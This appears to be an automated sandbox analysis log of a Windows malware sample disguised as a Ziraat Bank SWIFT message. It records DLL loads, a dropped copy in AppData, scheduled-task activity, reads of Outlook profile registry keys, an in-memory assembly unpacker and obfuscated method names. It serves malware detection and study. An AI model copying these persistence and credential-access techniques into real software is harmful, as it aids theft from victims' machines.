Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Ziraat Bankasi Swift Mesaji.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Ziraat Bankasi Swift Mesaji.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Ziraat Bankasi Swift Mesaji.exe

Static file information: File size 1084416 > 1048576

Source: Ziraat Bankasi Swift Mesaji.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x100400

Source: Ziraat Bankasi Swift Mesaji.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Ziraat Bankasi Swift Mesaji.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Accessibility.pdbj source: WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Xml.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: XfbOZ.pdb source: Ziraat Bankasi Swift Mesaji.exe, WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr, ZnbATfUbUgZW.exe.0.dr
Source:	Binary string: Accessibility.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.ni.pdbRSDS source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: mscorlib.pdbt source: WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: XfbOZ.pdbSHA256 source: Ziraat Bankasi Swift Mesaji.exe, WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr, ZnbATfUbUgZW.exe.0.dr
Source:	Binary string: System.Configuration.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Xml.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Core.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: mscorlib.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: Accessibility.pdbE source: WER79E4.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: mscorlib.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.pdb4 source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Core.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Configuration.pdbH source: WER79E4.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.2fa42f4.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, VbcBBJZsw7O8CJjepm.cs	.Net Code: SfcpcmE8Np System.Reflection.Assembly.Load(byte[])
Source: 12.2.ZnbATfUbUgZW.exe.2b142ac.1.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, VbcBBJZsw7O8CJjepm.cs	.Net Code: SfcpcmE8Np System.Reflection.Assembly.Load(byte[])
Source: 12.2.ZnbATfUbUgZW.exe.4ec0000.6.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, VbcBBJZsw7O8CJjepm.cs	.Net Code: SfcpcmE8Np System.Reflection.Assembly.Load(byte[])

Source: Ziraat Bankasi Swift Mesaji.exe	Static PE information: section name: .text entropy: 7.107483262139592
Source: ZnbATfUbUgZW.exe.0.dr	Static PE information: section name: .text entropy: 7.107483262139592

Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, YCLcRCtv5hOGbAklTW9.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UoUOmJ3V52', 'LOrOX1piYl', 'MUyOlLwudR', 'PqHO2Gu1PS', 'v3wO6ZQrCb', 'IqgOrSY33X', 'emmOWN0vKe'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, tMr0sf2ktQ0cqReIDA.cs	High entropy of concatenated method names: 'FQ1gH0gFbh', 'u1JgXLubl8', 'aPBg2Ekd0a', 'nDWg6FLEQu', 'poMg3TytSO', 'W1QgFXCJTp', 'aJDgJP2L8n', 'XUOgP8cR7G', 'cUrgfRXeB7', 'KNXgsjbWLK'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, n2rATXL28KV38R0smd.cs	High entropy of concatenated method names: 'mxvCaaZbhf', 'cJ8C161DYd', 'AR0GFRLX99', 'YVLGJKlEFZ', 'H3oGPPtHFX', 'kXhGfByKEy', 'rq3GsUTyJN', 'AFFGBuvqSV', 'dflGuKwCLX', 'rZ3GH6NZxs'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, eoHKWGipIdfiIN6Q0L.cs	High entropy of concatenated method names: 'Qm9cH5DoZ', 'kEtqOnrMO', 'fVi4B5fTA', 's7k1ha2GQ', 'qhS0acxga', 'K68LCWnBl', 'gN9mL4Rm7pIFXE8dpc', 'q7unU5sQ71OW9qUQvZ', 'ytJbETsbo', 'Q38OCcW9H'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, VbcBBJZsw7O8CJjepm.cs	High entropy of concatenated method names: 'vUeMTsG7Yg', 'yBsMSQ9qcu', 'bEnMwxbp89', 'fZ7MGkbFIV', 'x3dMCMW7Qh', 'TDAMQiEV6I', 'yByMDGtIK5', 'RXBMZLLlFV', 'Is9MNBucli', 'RWGMjtx0Q6'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, gSLYCAo2ks6U0tcLN5.cs	High entropy of concatenated method names: 'vJXQTpmxhP', 'QnHQwPAVPB', 'hacQCYnS4C', 'Ho0QDIS61H', 'cLNQZHAZMD', 'Jl1C5jbqAA', 'WWwCkuuU41', 'e7ACASsAtJ', 'HGdChbG8wD', 'D5ACVhboJc'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, Y95DWNwh79jC0AXIjs.cs	High entropy of concatenated method names: 'Dispose', 'MgxtVwbQ6K', 'b9vi35gSNy', 'tq00rvlqli', 'gk5tyQQJS6', 'WrmtzZKtJt', 'ProcessDialogKey', 'hHTiv6HXlj', 'xEjitGQdSC', 'QZeiiygONX'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, yXQVoVttah0gwrnpmqH.cs	High entropy of concatenated method names: 'vFQOyBiCh9', 'sToOzL9rP2', 'AxPnviZtKE', 'leWntKl2Ei', 'gC4nimkrjK', 'cpmnMrL2f5', 'T9pnpkZsS4', 'KoYnTJiKNK', 'SpsnSFdlwl', 'D6qnwUG6GS'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, e6HXljVdEjGQdSClZe.cs	High entropy of concatenated method names: 'UDgEoPs2XW', 'OU2E3AYO1D', 'BbREF2U7bp', 'JQCEJ4iy1q', 'WFyEPKeX3t', 'O2TEfYysit', 'j83EsbKgwM', 'toMEBglOtK', 'CTAEuIefHK', 'kZcEH5fiG4'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, tyXDLRpfYlQ2iT9RGj.cs	High entropy of concatenated method names: 'ShVtD2PtWR', 'tM7tZXgLEs', 'KoetjOSJB0', 'RlYt9792rA', 'p0stgmdwSL', 'pCAtR2ks6U', 'wR8smUlQqrluj4uv2e', 'gsLWqwgOh7w7V4tHpP', 'kh8ttM2Win', 'uQutMQIlAt'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, kVqatYrTNB5m8YTmaE.cs	High entropy of concatenated method names: 'ToString', 'IQ5Rm29Tkv', 'xwaR3ZxN7D', 'UJpRF9kgS5', 'FeORJ60lND', 'eJMRPgVRWy', 'hh1Rfn8d5h', 'u1wRsewFjN', 'uMlRB1EmXj', 'JX3Rul5r4q'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, SgBVfdGPMnyAiX4E3E.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'teuiVa8aI2', 'mLBiy6AFJE', 'O7qizDnmhH', 'jPbMvR4kXy', 'C2YMtJqWHU', 'yKBMiw8d1o', 'WnkMM79Yhk', 'T9WoxEj10i2uCMW3IgU'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, E4pxDVsdf93dcIK1T4.cs	High entropy of concatenated method names: 'gEtDSdmnMu', 'FaiDGff4Ph', 'nX7DQc15BA', 'LrnQyodmSW', 'UOJQzqAB5I', 'wrtDvDs0Au', 'bXeDtbU68i', 'gLRDiiOyOh', 'kOLDMBb5Pc', 'j5wDppHa4x'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, Vpq0WhJdv9bHlWPhF8.cs	High entropy of concatenated method names: 'x1iQK7C2XJ', 'ugcQdiq7A1', 'SCnQcQQoW5', 'P0PQqLvSFM', 'hg2Q4krnjt', 'oMyQ1f3e7a', 'Fo0Q0c3X6a', 'FJIQLDqaBK', 'SwYkSt799u7nDhqsETA', 'lPymrO7FNxRyy7BsraX'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, A8HxhQAA0ugxwbQ6Kw.cs	High entropy of concatenated method names: 'LyxEgdCkMP', 'ewFEYeyrdX', 'r2QEExiEZE', 'HI4EntmvQP', 'dJMExXIEtq', 'pm9EKSDxde', 'Dispose', 'RBXbS5HZw7', 'i4FbwKsKaV', 'mZPbGgYl1G'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, FplIaptp9erPBeVXkwT.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YxOeEwNDer', 'p9veOfWAT4', 'r8senpm1KA', 'V5See34x22', 'aHkexgegaG', 'YC4eI5x75q', 'njeeKiD6uP'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, xVB0TZzo6Y9IDP0lK3.cs	High entropy of concatenated method names: 'JKhO4Syf1Q', 'qZHO8nHvLw', 'ExdO0CUiVW', 'qSgOoexEhM', 'cd3O3S92A1', 'owPOJNI0qZ', 'FdYOPhrnnB', 'idROKNyb2v', 'lVSOdWCV3s', 'kybO7tLnij'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, WKZ2ys0oeOSJB02lY7.cs	High entropy of concatenated method names: 'CQ8Gq2kUKJ', 'MPHG4Sgv4d', 'kfMG8hUhm0', 'plmG0x0mc8', 'PKgGgciojX', 'QZoGR3V391', 'FIkGY8DB8Q', 'vuMGbfaAj1', 'Wk2GEg6TWi', 'JXtGOZLCKr'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, QyKpIStM0exlkftiGxj.cs	High entropy of concatenated method names: 'f90nyHd6iA', 'HsJnzBLTQJ', 'MCjevY9Ey6', 'orKVTp1t7oGHYWhtsVt', 'l7mwUr17ImvckZvh3EY', 'sEBKGL1GyOYX4rjDMcA', 'eWnK1f11CWQbeV07C8P'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, POQYhVu3cvE6cDmFGJ.cs	High entropy of concatenated method names: 'bKNDdv0DQm', 'QIjD7SPkHE', 'xXnDcbShch', 'b7uDqe2R43', 'V5hDamXu36', 'VMgD4E6xZk', 'Sf2D1dLkkx', 'CNgD8D4pCI', 'W6dD0y36Cl', 'eJeDLyNPZN'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, NL3VQZfQOXbtAH2bcc.cs	High entropy of concatenated method names: 'D2oQrXGFSO', 'QYVQWXjVTO', 'jxKQ5Qwv7h', 'ToString', 'SxpQkqdc6t', 'mo8QAeC1vO', 'wZIPwL7KtcB7JtYxoAk', 'DWH2E07h8TugABKyEfc', 't2RudB7aToU27c9GJep'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, ANDKXllOPerWYQIQNw.cs	High entropy of concatenated method names: 'VqIU8yiu3Q', 'N87U0wGnqe', 'qEtUoDQtDA', 'rHnU31gKVk', 'HKXUJyujPC', 'QNVUP6ALe4', 'ndlUshZQf7', 'VXEUBD9dyb', 'DbnUHNqk56', 'nn2UmLkxED'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, X2PtWR8nM7XgLEsiB1.cs	High entropy of concatenated method names: 'owiw26I08U', 'hZcw6BFuof', 'I1Awr7Evc1', 'sRpwW0XYsm', 'z1ew5PKgnQ', 'If3wkmi4Ng', 'DXswAlThxK', 'NU7whyVbhD', 'nt6wVLrU0Q', 'vdSwyXLA0q'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, YgONXxyGkWEK9kKFEi.cs	High entropy of concatenated method names: 'bu7OGruICi', 'MYTOCcnIDF', 'v5sOQn3WVP', 'nboODY3ejQ', 'F7GOECk4Ib', 'tBWOZEIF2Z', 'Next', 'Next', 'Next', 'NextBytes'
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, nRi2E6kBg4bm6wJjV9.cs	High entropy of concatenated method names: 'OifYhIbOnp', 'tZ3YyfuZHT', 'sh7bvnyeTg', 'y5PbtQomU8', 'XQZYmJe1dx', 'LYgYXwAKdp', 'nZvYlBWFXm', 'opHY2Dpfnf', 'ktDY6QTRmt', 'CcrYrsGyym'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, YCLcRCtv5hOGbAklTW9.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UoUOmJ3V52', 'LOrOX1piYl', 'MUyOlLwudR', 'PqHO2Gu1PS', 'v3wO6ZQrCb', 'IqgOrSY33X', 'emmOWN0vKe'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, tMr0sf2ktQ0cqReIDA.cs	High entropy of concatenated method names: 'FQ1gH0gFbh', 'u1JgXLubl8', 'aPBg2Ekd0a', 'nDWg6FLEQu', 'poMg3TytSO', 'W1QgFXCJTp', 'aJDgJP2L8n', 'XUOgP8cR7G', 'cUrgfRXeB7', 'KNXgsjbWLK'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, n2rATXL28KV38R0smd.cs	High entropy of concatenated method names: 'mxvCaaZbhf', 'cJ8C161DYd', 'AR0GFRLX99', 'YVLGJKlEFZ', 'H3oGPPtHFX', 'kXhGfByKEy', 'rq3GsUTyJN', 'AFFGBuvqSV', 'dflGuKwCLX', 'rZ3GH6NZxs'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, eoHKWGipIdfiIN6Q0L.cs	High entropy of concatenated method names: 'Qm9cH5DoZ', 'kEtqOnrMO', 'fVi4B5fTA', 's7k1ha2GQ', 'qhS0acxga', 'K68LCWnBl', 'gN9mL4Rm7pIFXE8dpc', 'q7unU5sQ71OW9qUQvZ', 'ytJbETsbo', 'Q38OCcW9H'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, VbcBBJZsw7O8CJjepm.cs	High entropy of concatenated method names: 'vUeMTsG7Yg', 'yBsMSQ9qcu', 'bEnMwxbp89', 'fZ7MGkbFIV', 'x3dMCMW7Qh', 'TDAMQiEV6I', 'yByMDGtIK5', 'RXBMZLLlFV', 'Is9MNBucli', 'RWGMjtx0Q6'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, gSLYCAo2ks6U0tcLN5.cs	High entropy of concatenated method names: 'vJXQTpmxhP', 'QnHQwPAVPB', 'hacQCYnS4C', 'Ho0QDIS61H', 'cLNQZHAZMD', 'Jl1C5jbqAA', 'WWwCkuuU41', 'e7ACASsAtJ', 'HGdChbG8wD', 'D5ACVhboJc'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, Y95DWNwh79jC0AXIjs.cs	High entropy of concatenated method names: 'Dispose', 'MgxtVwbQ6K', 'b9vi35gSNy', 'tq00rvlqli', 'gk5tyQQJS6', 'WrmtzZKtJt', 'ProcessDialogKey', 'hHTiv6HXlj', 'xEjitGQdSC', 'QZeiiygONX'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, yXQVoVttah0gwrnpmqH.cs	High entropy of concatenated method names: 'vFQOyBiCh9', 'sToOzL9rP2', 'AxPnviZtKE', 'leWntKl2Ei', 'gC4nimkrjK', 'cpmnMrL2f5', 'T9pnpkZsS4', 'KoYnTJiKNK', 'SpsnSFdlwl', 'D6qnwUG6GS'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, e6HXljVdEjGQdSClZe.cs	High entropy of concatenated method names: 'UDgEoPs2XW', 'OU2E3AYO1D', 'BbREF2U7bp', 'JQCEJ4iy1q', 'WFyEPKeX3t', 'O2TEfYysit', 'j83EsbKgwM', 'toMEBglOtK', 'CTAEuIefHK', 'kZcEH5fiG4'
